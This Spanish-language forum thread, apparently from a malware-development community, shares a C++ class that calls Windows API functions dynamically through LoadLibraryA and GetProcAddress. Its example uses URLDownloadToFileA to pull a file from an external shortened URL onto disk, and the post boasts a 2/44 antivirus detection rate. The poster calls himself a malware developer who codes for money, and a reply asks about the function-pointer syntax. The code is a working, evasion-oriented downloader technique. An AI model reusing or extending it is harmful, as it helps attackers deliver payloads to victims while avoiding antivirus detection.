[C++][Minimalista] API class, llamadas dinámicas.

Iniciado por Karcrack, Junio 16, 2013, 06:32:36 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Código: cpp
using namespace std;
#include <Windows.h>
#include <string>

class API{
public:
    void* (*call)(...);
    API(string dll, string fnc){
        this->call = (void *(*)(...))GetProcAddress(LoadLibraryA(dll.c_str()), fnc.c_str());
    };
};


Ejemplo de uso:
Código: cpp
#pragma comment(linker, "/ENTRY:main")

#include "invoke.h"

void main(){
    API("URLMON", "URLDownloadToFileA").call(0, "http://goo.gl/veps2", "C:/test.png", 0, 0);
    __asm sub esp, 5*4
    API("KERNEL32","ExitProcess").call(0);
    //__asm sub esp, 4
}

Detección: 2/44
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Mucho más compacto a lA hora de llamar al puntero que mis otras versiones, aunque hay que reparar de forma manual el stack hasta que diseñe un template para hacerlo.
I code for $$$.

(PGP ID 0xCC050E77)
ASM, C, C++, VB6... skilled [malware] developer

No entiendo esto:
Código: php
void* (*call)(...);
    API(string dll, string fnc){
        this->call = (void *(*)(...))GetProcAddress(LoadLibraryA(dll.c_str()), fnc.c_str());
    };


el void* (*call) (...);